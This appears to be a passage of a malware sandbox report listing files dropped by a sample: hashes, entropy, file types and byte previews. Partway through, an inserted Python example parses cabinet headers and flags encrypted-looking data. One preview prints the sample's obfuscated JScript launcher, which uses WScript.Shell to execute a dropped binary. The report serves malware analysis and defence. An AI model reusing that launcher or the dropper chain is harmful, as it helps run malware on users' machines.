                                                                                      MD5:9DD76500C74BBB507074A3DA164E755D
                                                                                      SHA1:72EBC79800AD7A96DCC8923A186D7ECA36561F28
                                                                                      SHA-256:6801E9D84DF9CAAB43718B737D58E5E3CD3CB614DBAFEB50776630FCD8E6694C
                                                                                      SHA-512:531E901749A8C5687310E8330A8558384A94C28587AC8B6B3EE362449F2C46B9F27BBF3C162095A030D880E6693E477F62FAB7A2C24F7D89FED0AC0E09A8C494
                                                                                      Malicious:true
                                                                                      Preview:new ActiveXObject("W"+"script.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\ConnectWare Technologies Ltd\\LinkHub.com\" \"C:\\Users\\user\\AppData\\Local\\ConnectWare Technologies Ltd\\y\"")
                                                                                      Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):702975
                                                                                      Entropy (8bit):7.9996899596807305
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:7oJEXO+WtgpSKS6G4epnMRNutIPcIyuSvcmeeVURApKFWRR51vR0pGlh7e7:wE++WKUsGqcIyuSkeVURAw2JvRmGlh7c
                                                                                      MD5:40320097845035E71C88A2796F2F751B
                                                                                      SHA1:C6002D6BEC7322277FE88154FDE0829C8A8E2762
                                                                                      SHA-256:62BD76A99BCD9EAE526C4A6D147C02832138A6AA1D38559DB20174F74D806946
                                                                                      SHA-512:57780D293AE512BBCF53F13AFF29851C9A94A4F7ED1D51654CEDD06A6089D80AAEDCCF68F7CC5D3B37659E77AD3058EC72AE8CCB18BBD7478C5FB06F93776074
                                                                                      Malicious:false
                                                                                      Preview:....].Z...%.o....."7.;?..F.....x..=.[......F..&.P.P.f.1.xi$!..H..9..d$...E<.....t.3...........adW2.P.),CG.!f9.x:.."l..C'.......i.......;R........7...m.`..X.mH..T..].Te..c6...........E..u....8..k.#.ac...)..E.N:....B.NX..l..e.."...ytLW.;T.b./w...1TI)..<z."LH%+....R...N..v2...A.s...~.&=..4.....p..,.[v..#..F..-..._.. G,......HA.X.T...U.O[..J...h|...qX.....i.[a+X........Z..Q..........'Y...J."..:........W.m...e..+....?8/.z.._.....*....,.N....r.V/Q..N.z14.9....I..B... .S.7...."...'AC..)........Y.]^%r.TPd..k...'b..d.B.:.3.tX4..o%.p ...wNG2^/..i.>..E...^m...|X...RY.BI.q0.......Kdz.....-.l..b....].y..'..j.C...>...>0.0.[.!.xSk..;7V.......%.O..P...C...'O.sjT..,.S..'-.f..t6.'s.N.Z.^.{|.8.L.o;,.V...vC...B.p.X(T%..q..T..z....*......M.2.....?.MF.........sJ...8.....fp.\....^......."...6 ..Mw... k..v-.....B..$....E.ndEc...."...%...Swiltb....R.....^M../.........@6$c}.K..gp.R.O....s..E.$.d...r;....k.gdK2.(IG[.*.I...?.v.tfJ..9....+..*J.....g.....g.WK.....\
                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:modified
                                                                                      Size (bytes):947288
                                                                                      Entropy (8bit):6.630612696399572
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                      MD5:62D09F076E6E0240548C2F837536A46A
                                                                                      SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                      SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                      SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):702975
                                                                                      Entropy (8bit):7.9996899596807305
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:7oJEXO+WtgpSKS6G4epnMRNutIPcIyuSvcmeeVURApKFWRR51vR0pGlh7e7:wE++WKUsGqcIyuSkeVURAw2JvRmGlh7c
                                                                                      MD5:40320097845035E71C88A2796F2F751B
                                                                                      SHA1:C6002D6BEC7322277FE88154FDE0829C8A8E2762
                                                                                      SHA-256:62BD76A99BCD9EAE526C4A6D147C02832138A6AA1D38559DB20174F74D806946
                                                                                      SHA-512:57780D293AE512BBCF53F13AFF29851C9A94A4F7ED1D51654CEDD06A6089D80AAEDCCF68F7CC5D3B37659E77AD3058EC72AE8CCB18BBD7478C5FB06F93776074
                                                                                      Malicious:false
                                                                                      Preview:....].Z...%.o....."7.;?..F.....x..=.[......F..&.P.P.f.1.xi$!..H..9..d$...E<.....t.3...........adW2.P.),CG.!f9.x:.."l..C'.......i.......;R........7...m.`..X.mH..T..].Te..c6...........E..u....8..k.#.ac...)..E.N:....B.NX..l..e.."...ytLW.;T.b./w...1TI)..<z."LH%+....R...N..v2...A.s...~.&=..4.....p..,.[v..#..F..-..._.. G,......HA.X.T...U.O[..J...h|...qX.....i.[a+X........Z..Q..........'Y...J."..:........W.m...e..+....?8/.z.._.....*....,.N....r.V/Q..N.z14.9....I..B... .S.7...."...'AC..)........Y.]^%r.TPd..k...'b..d.B.:.3.tX4..o%.p ...wNG2^/..i.>..E...^m...|X...RY.BI.q0.......Kdz.....-.l..b....].y..'..j.C...>...>0.0.[.!.xSk..;7V.......%.O..P...C...'O.sjT..,.S..'-.f..t6.'s.N.Z.^.{|.8.L.o;,.V...vC...B.p.X(T%..q..T..z....*......M.2.....?.MF.........sJ...8.....fp.\....^......."...6 ..Mw... k..v-.....B..$....E.ndEc...."...%...Swiltb....R.....^M../.........@6$c}.K..gp.R.O....s..E.$.d...r;....k.gdK2.(IG[.*.I...?.v.tfJ..9....+..*J.....g.....g.WK.....\
                                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                                      File Type:Microsoft Cabinet archive data, 488285 bytes, 11 files, at 0x2c +A "Instantly" +A "Dressing", ID 8829, number 1, 29 datablocks, 0x1 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):488285
                                                                                      Entropy (8bit):7.998550946105718
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:GtaS7z1F+D7f32HLxjQ8IeOFg8CAINNtUcfgBTG12Zqc:+aS7zqDcLxk8Ie5ZNN6cQqwZqc
                                                                                      MD5:7A07DED0E02828AA5F3CFBAD5642C558
                                                                                      SHA1:166EAD6F90D79790E559C7CB19BC2588E6EDBAE1
                                                                                      SHA-256:2089D963BDAD621F966AC18E371FBF4BDD2E94CFA1841142EDF317E4B971F28B
                                                                                      SHA-512:9DA78695AC581646ADBA790FBBFEE3E2E26DA4F60C75FCABCF11D30E06054D59C6E3A764B4828EEBC6592E7FE5255BF1778AE1A8877D60E1A45C971B9D2586D6
                                                                                      Malicious:false
                                                                                      Preview:MSCF....]s......,...............}"..<........`........'Z.% .Instantly......`....'Z.% .Dressing......x....'Z.% .Measurement..$...|....'Z.% .Indonesia..@.......'Z.% .Led...........'Z.% .Different...........'Z.% .Missed...........'Z.% .Clinton..|........'Z.% .Brian..........'Z.% .Protocol..4..]@....'Z.% .Constitute...b..K..CK...|...0>..,.Y1.......ltA.K$.l.H.....[..>.....'[..n...Zk...>..m..Uw...~..Jb..E..DX>.l d.s..n....y...~.s?.=..{.=..s........[.Fwm.g..\OR..q.l'..>.G...|..r.s9..p...>..[.B.\....e.99"..ub...x......i(.r.........S2.)..3.8.xXl........o#..YE.(...%...7Z.N.....|.F.f..l..H.b...KI..1..mm.3.B.V....x.V..{..f..p.Z....V[%.T.....r......^.S@*w.#..r...lQ.&b?P..Y.]MN~(.b.Ja........-..1..T.m...\v...v...>.......0...a.K.X.X..ib.I..#q.....K....."...).4...d..F.,....62>.X.e.7....7..i..[.(....[.5..m..Y#"....."~.9xz..S.....j..i.][7NU...2k..__...|uL.*....M..Y..rP..7.....F..Q......B$.O...ZO.]n.U..n..z..;Jj..H...Q...G/K..+c.MEj.l..j.*...Jl..[l..|.~.....f.*.>..
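The entry above shows how the report's "File Type" line is read straight out of the cabinet's own header: the CFHEADER fixed block is 36 bytes and is followed by one 8-byte CFFOLDER, so the first CFFILE record sits at 0x2c; "ID 8829" is the setID field, "29 datablocks" is CFFOLDER.cCFData and "0x1 compression" is typeCompress (MSZIP). The high entropy of the other files msword.exe drops is what drives the "Encrypted:true" label. The following Python is an added example, not Joe Sandbox or malware code: it builds a synthetic CAB header that carries the same eleven member names, set ID and folder values as the sample (member sizes are made up), parses it back with struct, and applies an entropy threshold to two constructed buffers. The 7.9 threshold for "looks encrypted" is an assumption about how the report labels files, not a documented Joe Sandbox value.

```python
import math
import random
import struct

# Fixed-size parts of the Microsoft Cabinet format (all little-endian).
CFHEADER = "<4sIIIIIBBHHHHH"   # signature, reserved1, cbCabinet, reserved2, coffFiles,
                               # reserved3, verMinor, verMajor, cFolders, cFiles,
                               # flags, setID, iCabinet  (36 bytes)
CFFOLDER = "<IHH"              # coffCabStart, cCFData, typeCompress (8 bytes)
CFFILE_FIXED = "<IIHHHH"       # cbFile, uoffFolderStart, iFolder, date, time, attribs
MSZIP = 1                      # low nibble of typeCompress; the report's "0x1 compression"
ATTR_ARCHIVE = 0x20            # shown as "+A" in the report's file-type line

# Member names taken from the report's preview; sizes are constructed for the example.
MEMBERS = [("Instantly", 300), ("Dressing", 7200), ("Measurement", 1500),
           ("Indonesia", 64000), ("Led", 2100), ("Different", 9000),
           ("Missed", 17000), ("Clinton", 124000), ("Brian", 41000),
           ("Protocol", 52000), ("Constitute", 170000)]


def build_cab_header(members, cb_cabinet, set_id, n_datablocks):
    """Constructed CFHEADER + one CFFOLDER + CFFILE records (no CFDATA payload)."""
    files = b""
    folder_off = 0
    for name, size in members:
        files += struct.pack(CFFILE_FIXED, size, folder_off, 0, 0, 0, ATTR_ARCHIVE)
        files += name.encode("ascii") + b"\0"
        folder_off += size
    coff_files = struct.calcsize(CFHEADER) + struct.calcsize(CFFOLDER)
    header = struct.pack(CFHEADER, b"MSCF", 0, cb_cabinet, 0, coff_files, 0,
                         3, 1, 1, len(members), 0, set_id, 0)
    folder = struct.pack(CFFOLDER, coff_files + len(files), n_datablocks, MSZIP)
    return header + folder + files


def parse_cab(buf):
    """Walk CFHEADER -> CFFOLDER[] -> CFFILE[] and return the fields the report prints."""
    (sig, _r1, cb_cabinet, _r2, coff_files, _r3, _vmin, _vmaj,
     n_folders, n_files, flags, set_id, _icab) = struct.unpack_from(CFHEADER, buf, 0)
    if sig != b"MSCF":
        raise ValueError("not a cabinet: bad signature")
    if flags & 0x4:  # cfhdrRESERVE_PRESENT adds variable-length reserve areas
        raise ValueError("reserve fields not handled by this example")
    pos = struct.calcsize(CFHEADER)
    folders = []
    for _ in range(n_folders):
        coff_cab_start, c_cfdata, type_compress = struct.unpack_from(CFFOLDER, buf, pos)
        folders.append({"data_offset": coff_cab_start, "datablocks": c_cfdata,
                        "compression": type_compress & 0xF})
        pos += struct.calcsize(CFFOLDER)
    pos = coff_files
    files = []
    for _ in range(n_files):
        cb_file, uoff, i_folder, _d, _t, attribs = struct.unpack_from(CFFILE_FIXED, buf, pos)
        pos += struct.calcsize(CFFILE_FIXED)
        end = buf.index(b"\0", pos)           # szName is NUL-terminated
        files.append({"name": buf[pos:end].decode("latin-1"), "size": cb_file,
                      "folder": i_folder, "archive": bool(attribs & ATTR_ARCHIVE)})
        pos = end + 1
    return {"cabinet_size": cb_cabinet, "files_offset": coff_files,
            "set_id": set_id, "folders": folders, "files": files}


def shannon_entropy(data):
    """Bits per byte, 0.0 .. 8.0, the same measure the report's Entropy (8bit) field uses."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


ENCRYPTED_THRESHOLD = 7.9  # assumption: files near 7.99 are labelled Encrypted:true


def looks_encrypted(data):
    return shannon_entropy(data) >= ENCRYPTED_THRESHOLD


# Constructed inputs: a pseudo-random 64 KiB buffer and a low-entropy text buffer.
_rng = random.Random(1)
SAMPLE_RANDOM = bytes(_rng.getrandbits(8) for _ in range(65536))
SAMPLE_TEXT = b"abcdefghijklmnopqrstuvwxyz" * 100


def demo():
    """Build a header with the report's setID/datablock values and parse it back."""
    return parse_cab(build_cab_header(MEMBERS, 488285, 8829, 29))


if __name__ == "__main__":
    info = demo()
    print(f"first CFFILE at 0x{info['files_offset']:x}, setID {info['set_id']}, "
          f"{len(info['files'])} files, {info['folders'][0]['datablocks']} datablocks")
    for f in info["files"]:
        print(f"  {'+A' if f['archive'] else '  '} {f['name']}")
    print("random buffer encrypted?", looks_encrypted(SAMPLE_RANDOM))
    print("text buffer encrypted?", looks_encrypted(SAMPLE_TEXT))
```

The parser deliberately refuses cabinets with the reserve flag set rather than guessing at the reserve sizes; a triage script that silently mis-parses CFFILE offsets will list the wrong members, which matters when the member names are the only human-readable clue to what extrac32.exe will write to disk.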
                                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):67584
                                                                                      Entropy (8bit):7.997420919125293
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:mPM2IWHYOOcbdpzCNBSD2XTn32zuIcRgk64wnWEi8o:mP5THh5b3+n32zo64Ao
                                                                                      MD5:18E13DD846278DD017E9BDD8322ACF0E
                                                                                      SHA1:431DDC2AF8197F887CF7E9B5346792FDBF0F07E3
                                                                                      SHA-256:4784DDD355896DE73BCCCDB7D0AFD69D6376ADE1F3A22B18BFDA58EB4DFB0744
                                                                                      SHA-512:005CBE957E2FE900299A82168D0CEB4FF9A89FE82B407103A7DA34BED1C0F12CF22850080D2EB22FAD5A0BAC7813696103BAFCA6735FB31223BEFFF0697CCE2F
                                                                                      Malicious:false
                                                                                      Preview:.w..+..h}...X.M....N..h.y.......>...e......pD..{..S....u....8...!.9.....Q.G..rB...d.._..q.~...}8.../.CW.E.`.......c.}..x...M..H..,Mk...N..K......G.>..F.Ru....-....9.Y...q...3$.iN.!.|.g...n...k..W.i..g..J.L.....P.....F'{6}.i.<,a}..i.....]"......y.yi.+..C..-^j....T.6..j.5..f..&..DN4.$B.i.&..#..K..d......."...."U...r...Qm..V....6....e.....X.vw...I..B<ei....}.>l._,......H.kq.5...........{.QT.Z'.dF[...fkMH$V%....K....y.M..b.G....lv.....>.q..n...-..D7;F~...Ix..AL.5.}......0..9X..w.I...o..\...a.<..a&<...t(.iz.?.N...mx.o...O.b.}5G.~.c.#.....==...O..RY......o..]...G?=.<.;...N.^.E.2.3....=...X*C.6..XC.)H<......4.?>\...Ng...C.vHLv<..A..u.p*-qs.G)z.8|.s.<V.._..6.`.^..#.^..._o...4..^h....!"&I...>....b...'.=I(.'e..!..Z..R1;..3A..F/.Jwr.GcX*GO?.t...f^1G...cF..@.iC.U.8.#..$..p......e2....U..j.c....q..V.rL....xf...F..X85.5.L#K.T.s..a.c`......z_.Y..9E.6......>...x2...=.d..`...^.U.p~..n.U.#........S.BY..n/........]..M....1...J8..%.:..l..s.8...\....J...D.y.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):101376
                                                                                      Entropy (8bit):7.9982174281872025
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:tYj0CGgXe/2IS6hnqS2WONlLUDBt7itJs6g:tYVG4ehSOnMWONlY9t7itJQ
                                                                                      MD5:99A9AA7C4197C9FA2B465011F162397E
                                                                                      SHA1:F4501935D473209F9D6312E03E71B65271D709E4
                                                                                      SHA-256:6196D79DC188E3581F8446637CF77E8E9105000E7A8A8135213F750D9BC65EB0
                                                                                      SHA-512:03EF41FC61EC810C788252EEDCDC7C2616A55C2CF0996F830DAB1A60982589360CAD7C71B76A199A94DE0337BD068AC1A7A6503CE67CC091BAF1C6C6758B01F5
                                                                                      Malicious:false
                                                                                      Preview:4t....d+.R..f[.V....3@.....L?/.'.D.."........I..6..q..AC..CK.W.xjt[.:.....m>..PWV.l......BQ.H.x.xw..,?..S..$.. .. y..........do....R.a..Hn...N.x..I.R.j.1.D..`..L.D.`x4.....`v.. .q...D.b......J.{.6|..m.......k.!.7.4.Z%.............(...O/.'".A.H..{r(.Z.$.......-......ZXo.ts.r.......i..~Y.w.l..aS....lv.DI?g{'Z..J.Sq.s.......>OB..-.#k.t...M.Y@~x. .C0.h...C.6O...5.K2!0.Z..+.@F.T...{k.U...S....u.n]...M.7S.....[..;.D..o.....t...H.&.c.2.7.*..%...".&].2....@......Q...YZ.d.P...r\.;...*e......b(.....Xc.8...h....k....O..p.i.@$..q..k8....3...:....&@)x.....j....c.k.x.$9,.0..".....v......Q.d.*.?cW..&mmw.g..U`.....R7..P..^..1.f.Mb......?...^....6.v..P...K...j.`f.I.?..lJ6.F...q..{.}..C......@.L.w....k.Au....@V.x..{l,.%)....*>...i.y.b.....5.G*[....n....i.G...a.....".A...h.!6+../....P.....L...>".Y.0....q.39.P..!bj...da*.#e......-.U....h...mh.+..V.}....<./....F.dw...,.l......j5...B<..30.,...W.m#].F.O..FLP.d..:.....L..~F0e..j.zq..)p(h...R...}p.B
                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):97280
                                                                                      Entropy (8bit):5.234350627932401
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:Jx/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R:JdKaj6iTcPAsAhxjgarB
                                                                                      MD5:031B6C0EDF7E1DD8ACF9700CC96085D7
                                                                                      SHA1:0819EC14EBC323A9507E52A0579F6F9BA1589C3D
                                                                                      SHA-256:7FA45FC5F2F9C52E289D56F5AF6B95427EDC979A838608DC20CB4D89C7078553
                                                                                      SHA-512:75577FEEB70AF3025A021FB8DD3FC52B56AC9EC7CE7B0BB24E2970CA3626A0B96984ADB7874AE5608C9A739BC46E5C2207C98B2CB0C40925B2D95B7A2969A7BA
                                                                                      Malicious:false
                                                                                      Preview:?.?.?.?.?.?.?.?.?.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.r.r.r.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.A.A.A.A.A.A.A.A.A.A.r.r.r.r.r.r.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.r.r.r.r.r.r.r.r.r.r.r.C.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.
                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):69632
                                                                                      Entropy (8bit):4.910075425726921
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:FOWel3EYr8qcDP8WBosd0bHazf0Tye4Ur2+3:F5el3EYrDWyu0uZo2+3
                                                                                      MD5:2BC25537976C2E146EBED51446CE7B59
                                                                                      SHA1:0EBD76401729D4F1B9B4DCAB1586D96CD410A1D2
                                                                                      SHA-256:F01BA73C4332997F031434DDA3EBBFE03EE70F9BE65275ABEEDE452E148B94E7
                                                                                      SHA-512:7BA4AEA3D8836216CDFB4B27EC7AF041BF9EDB5A0DEA8BEECE8C7950BC9BC793B12F7E7C1A0B4EA6E0194A1211CACBFB06204E68689E0DA3E895BE8518572A80
                                                                                      Malicious:false
                                                                                      Preview:................................................................................PST.............................................................PDT............................................................. .L.`.L.....................................`.y.!...............................@~............. ...............................@.............. ...............................A.................[.........................@~......Q...Q.^. ._.j.2.........................1~........................................................................................................ .............................................................................................................................................................................................................abcdefghijklmnopqrstuvwxyz......ABCDEFGHIJKLMNOPQRSTUVWXYZ.............................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):72704
                                                                                      Entropy (8bit):7.997164994069138
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:bdM1aIyizRac/AX9Cslc7g63p8ueagJNvZoNoWRY6Du/FI84:ZVIyQ/o91658ueaa2PS/FIj
                                                                                      MD5:990ABD973C6DDB75837EEB5B21F59AE1
                                                                                      SHA1:85846C0CE7CD3314DEC32E3BED99511A59B6500A
                                                                                      SHA-256:29B9FA04343B577FFB55491F820A6D1978230072AE4752AD42836CF0581CD5E2
                                                                                      SHA-512:179561473340EB92A5BCAFE243217D9C8158572239294DDF45CB0FBDEF0EBAE1B07863C631CE7BFB983F65F627268300812EB38AAABCBA3CFF90F5D014C06754
                                                                                      Malicious:false
                                                                                      Preview:.Zhz.&..N.......B.z..si.....u...4A[.F.A.$...O..Y....]..3&M.p%.?.>Z..O.q..$X...KuS.a.C.....(J..#.f...k.c...0..o0.L..,..2k.Lc.x."........0...X...Q..Ix...Ep...y*w..1...V.~........h\pK3m ........(h..|.gp....@..:.O.K.....(...v..s.{.{..wz..].fh..j.8}}..F95..T...pX.............)j?.....%.Q"....{.#}..,dz......]d%..... .K..z#..{C.B......Z.....j{.u;..Yhl...[...T.80.y<dc.2IHG..8......1..x.....pF.%. ....f5>.CT7.}.."....<...4E.k.m.......o.....\G.y.WK[|.."}...E...../.$.......d.|..X.-^.d.F"..".W..(..<.........HQ............M!c......?*Z32.>.$.._.yR...\.-.=O.p.x...y.z.E...._.a/6..Q...3...QG..P.kQ2...FU.!$.)..ve.......N...B..j.{..`...Q.t ..;.\.J!O F.3..o1U....*.4gJ.U.N....x.I 9C3..V....Z.../..u.",.J.q..Q'l.o...h ....V>m...d..._.d...V..-.H..H..Pw....M...b.-9...cgV.b..._...D.a....x.V....y^..Yaq...#......-"q....0v7.dB....T.!.........d,.)u.....Y...P^.p....]sX.(."..A.ky1..SFK..G..G^.p..#.8c.q.....~....{.d..b......l..o...Q......l..G.g.t9}....Q....`...KX.
                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):144384
                                                                                      Entropy (8bit):6.494296209067955
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:5dgQa8Bp/LxyA3laW2UDQWf05mjccBiqXvpgF4qv+32eOyKODOSpQw:LgQaE/loUDtf0accB3gBmmLsiS+w
                                                                                      MD5:57BB8B206C43DDE57D7066A4DEDB272C
                                                                                      SHA1:E3B400206A6D3C7C5885CB56BFCAB82220BB110A
                                                                                      SHA-256:821735E47ECA9D213B65D12878DCA3D3EC620B5FE0555F0BD3B73EEE459A6D4F
                                                                                      SHA-512:C5E0C68E27CFC9705178C261FC617EAC27D745CDF93F88D01A49D3025AD7025038FB8DB5FA36D96089D4410BB965E9163282A99A0D6EAE40ED6783AF6C5BD074
                                                                                      Malicious:false
                                                                                      Preview:..F...................E....;E...MN..;...EN.........H......T...$.P*A........x...........U...E.....M...E.....;E...NK..;...FK.........[.......v.......[..h.........O.......W....O...............................O...7...........%....v..0...Hj....~.............F..F.@....#O........3.F...............Q.w....N.....E...M....Q.6P.s....M...............G..X........[............S........S............S........R.......w....R........R.......d............v..........R...7...........F............_^3.[..]........BN.......W...<N...........=.....................2.....F........H..........$.x*A....c.......Z...;...|....N......u........P..................S.......*A..$..*A......V.......1....7........u...S...l....q...........h....$..*A....N...V...]....M...H..........$..*A.....f...s..].....f...C.j..v..6.p..0.j.......................................+..M......+....M..E....u....;...AJ..;...9J...}....T......Vf...v....Lf...C.j..v..6.p..0........'........Q......F..........Q......F.........
                                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):56320
                                                                                      Entropy (8bit):7.996610067500435
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:Uq7NUVrVpkmRwRjr3psvmpMfmPO6rpciGjMzjM:UKNUVrkRRGm1PO6mj4M
                                                                                      MD5:583A66DF71B30CE556F3F5131162AA1C
                                                                                      SHA1:0594EF5DF9510410B520282D9C833D604969865A
                                                                                      SHA-256:83A055C80F22D870C163A6ABC49664C8A9F8D14CB9CDB11DFBCB70AD72191D4C
                                                                                      SHA-512:3939472BA5061896D4F8E0F1F97ED34B52D32F5D27DA41FC5C92EF73653482102349AF607F327B15B13FD208C970B95DBB3B714332FF1D58CFDFF25C0C1C4C3A
                                                                                      Malicious:false
                                                                                      Preview:J.....9.b......h....=<.5}.^U....}./.L.k6nz....Q..7z3.c..... 2..b8..c.a...C.....2y.(.0..-...S....8....o,.T*.&.c..G. .....q.B..Sf..........M....m.A|..S.N.:....?0R*....$*:...........q.q.!.F....T..h.....d.s...fR.+\1.[+o.;u..u..{g<.......4.f..w..-..._.Q....yT.<L..h.G.j...._@.9c;sT.....<...-k.1..NW....1q..?.KZ...u.........{?....?..pl.-...|..O,f)q.oZ.=....G..2..5,q.\.......H%..+......N..Z...h.......t.{.m..6.d....3.Y..9........w...e.\";.;.!...S..[...........t.;..Ek.c_`....+."...Q._?[.1 ..d...]....6..Y.v.qh...Ss!...v.$..H........f.....?.a*.\..R.-.w....b.1..g..yJL...)...A*J.>JYl:.[m....{^...<.G..M.4A.W...J..yd.Y..s....V..V.p..d...r..`....p..S.@.p..c.M....."D~.J.C.].R...j......*J..F.o.s#...Nq..V...`..t/........v.p2B.Z*6....=.A...4S,...R.e...F.6..e.Q.y.>..O...e.%..~....tj....|.e.$.j9%.[[..x9w.G..g.`.....^.p.I.f......k.4....%..9....nnz...3_fy..|..a..@6.C.,.P.....V...d..P..Fn.. ...B....Zs....inB<...&..5c....B...w)S.....E@2..%....b.l-.l
                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):70656
                                                                                      Entropy (8bit):6.548010857173451
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:V1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXElJUzdz:VZg5PXPeiR6MKkjGWoUlJU5
                                                                                      MD5:56BB83409EE3E1A9DDF64E5364CBAAF6
                                                                                      SHA1:C3DA7B105A8C389BE6381804CB96BB0461476E39
                                                                                      SHA-256:D76B1AAACC225CD854E0EC33C5268C02824EE4A1120B5217916C24D23E249696
                                                                                      SHA-512:59D1D8C1C613F89CBAA8B5C242CEA4889BA8F8B423D66598C5ED3A26FD82752A9CA0742C1ED932B3A1FBEDB5B8701AB6321C35E9DDE5A801625350CFF7990AC6
                                                                                      Malicious:false
                                                                                      Preview:U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F|U............[............u......3........................l.....p.....t.....x.....|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F...W.......Q......~....Y.......~._S.....Y.M......V..N.....F.^[]......U..QQ.}..........L)M....tv.}.........@)M.3.VW.}.B....U..0...E............}..t .M.......~L........E.j.P.FL......E....u..E ...u..~8...q....._^....3....FP..FT..U...u...(M..K...P.....j.j.j..u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.j.Z.U.;........T)M.....0........
